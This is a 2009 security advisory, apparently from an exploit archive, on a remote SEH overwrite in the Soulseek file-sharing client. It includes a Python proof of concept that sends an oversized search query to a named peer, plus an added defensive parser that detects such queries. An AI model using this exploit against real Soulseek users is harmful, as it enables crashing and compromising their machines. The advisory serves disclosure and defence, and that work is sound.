Soulseek 157 NS SEH Overwrite
Posted Jul 3, 2009
Authored by laurent gaffie

Soulseek versions 157 NS below 13e and all versions of 156 suffer from a remote peer search code execution vulnerability.

tags | exploit, remote, code execution
SHA-256 | f4dc93b0e17e9d360d0c68d40d4e75142ee147a08f18dd69e8e6d31951a951dc

Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution
=============================================
- Release date: July 02, 2009
- Discovered by: Laurent Gaffié ; http://g-laurent.blogspot.com/
- Severity: critical
=============================================

I. VULNERABILITY
-------------------------
Soulseek 157 NS < 13e & 156.* Remote Peer Search Code Execution

II. BACKGROUND
-------------------------
"Soulseek(tm) is a unique ad-free, spyware free, and just plain free file
sharing application.
One of the things that makes Soulseek(tm) unique is our community and
community-related features.
Based on peer-to-peer technology, virtual rooms allow you to meet people with
the same interests, share information, and chat freely using real-time messages
in public or private.
Soulseek(tm), with its built-in people matching system, is a great way to make
new friends and expand your mind!"

III. DESCRIPTION
-------------------------
The Soulseek client allows direct peer file search, letting a user look for the
files they want directly on the peer's computer.
Unfortunately, this feature is vulnerable to a remote SEH overwrite: an
over-long search query sent to a peer overruns a stack buffer and overwrites the
exception handler record.

IV. PROOF OF CONCEPT
-------------------------
This proof of concept will target a user called 123yow123.

# Python 2 (str-based sockets), as in the original advisory
import struct
import sys, socket

ip = "IP_ADDR"
port = 0            # PORT_NUM: replace with the peer's listening port (an integer, not a string)
                    # You can find out, how to find out IP/PORT if you RTFM :)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((ip, port))
except socket.error:
    print "Can't connect to peer!\n"
    sys.exit(0)

junk = "\x41" * 3084                        # filler up to the SEH record
next_seh = struct.pack('<L', 0x42424242)    # lands on the "next SEH" pointer (marker value)
seh = struct.pack('<L', 0x43434343)         # lands on the handler pointer (marker value)
other_junk = "\x61" * 1424

# PeerInit message (length 0x17, code 0x01): username "123yow123",
# connection type "P", token 0
buffer = "\x17\x00\x00\x00\x01\x09\x00\x00\x00\x31\x32\x33\x79\x6f\x77\x31"
buffer += "\x32\x33\x01\x00\x00\x00\x50\x00\x00\x00\x00"
# Search request (declared length 0x0c21, code 0x08, token, declared query
# length 0x0c15) followed by a query string far longer than declared
buffer += "\x21\x0c\x00\x00\x08\x00\x00\x00\x6c\x7b\x1d\x0c\x15\x0c\x00\x00"
buffer += junk + next_seh + seh + other_junk

s.send(buffer)


After the query is sent, the SEH handler on the receiving peer is overwritten.
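For defenders who want to spot this on the wire, the following is an added example (not part of the advisory) that walks Soulseek peer framing as laid out in the PoC above: a 4-byte little-endian length, a 1-byte PeerInit code (0x01) on the first message, 4-byte message codes afterwards, and length-prefixed strings. It flags search requests (code 0x08) whose query exceeds a threshold and messages whose declared length does not match the bytes on the wire; the helper names, the MAX_QUERY_LEN value and the sample streams are assumptions constructed here.

```python
import struct

PEER_INIT = 0x01             # 1-byte code on the first message of a peer connection
FILE_SEARCH_REQUEST = 0x08   # 4-byte peer message code carrying a search query
MAX_QUERY_LEN = 256          # assumed sane upper bound for a search string (policy, not protocol)

def read_string(buf, off):
    """Soulseek strings: 4-byte LE length followed by raw bytes."""
    (n,) = struct.unpack_from('<I', buf, off)
    off += 4
    if off + n > len(buf):
        raise ValueError('string length %d exceeds message body' % n)
    return buf[off:off + n], off + n

def inspect_peer_stream(data):
    """Walk length-prefixed peer messages and return a list of findings."""
    findings, off, first = [], 0, True
    while off + 4 <= len(data):
        (length,) = struct.unpack_from('<I', data, off)
        off += 4
        body = data[off:off + length]
        if len(body) < length:                     # declared length overruns the stream
            findings.append(('truncated', length, len(body)))
            break
        off += length
        try:
            if first:                               # PeerInit uses a single-byte code
                first = False
                if body[0] == PEER_INIT:
                    user, _ = read_string(body, 1)
                    findings.append(('peer_init', user.decode('latin-1')))
                continue
            (code,) = struct.unpack_from('<I', body, 0)
            if code == FILE_SEARCH_REQUEST:
                (token,) = struct.unpack_from('<I', body, 4)
                query, _ = read_string(body, 8)
                verdict = 'oversized_query' if len(query) > MAX_QUERY_LEN else 'search'
                findings.append((verdict, token, len(query)))
        except (ValueError, struct.error, IndexError) as e:
            findings.append(('malformed', str(e)))
    return findings

def build_search(user, query, token=0x1234):
    """Constructed sample stream: PeerInit (type "P", token 0) then one search request."""
    init = (bytes([PEER_INIT]) + struct.pack('<I', len(user)) + user
            + struct.pack('<I', 1) + b'P' + struct.pack('<I', 0))
    search = struct.pack('<II', FILE_SEARCH_REQUEST, token) + struct.pack('<I', len(query)) + query
    return struct.pack('<I', len(init)) + init + struct.pack('<I', len(search)) + search
```

A benign stream yields a peer_init and a search finding; a query sized like the PoC's filler is reported as oversized_query, which is the signal to alert on or drop at a proxy.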


V. BUSINESS IMPACT
-------------------------
An attacker could exploit this vulnerability to compromise any Soulseek client
prior to 157 NS 13e.

VI. SYSTEMS AFFECTED
-------------------------
Windows all versions

VII. SOLUTION
-------------------------
Upgrade to 157 NS 13e
(http://slsknet.org/download.html)

VIII. REFERENCES
-------------------------
http://www.slsknet.org

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com


X. REVISION HISTORY
-------------------------
July 02, 2009

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII. PERSONAL NOTES
------------------------
The Soulseek team patched this bug a month ago; a distributed message urging
users to upgrade their Soulseek client has been sent for a month now, and not
many users still use vulnerable Soulseek versions.
@to the ones who like to rip bugs and make an exploit ""universal"" for fame:
just make sure it's at least universal before you say so.
For the others: http://www.youtube.com/watch?v=tVACUjHn6yU :)

@RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html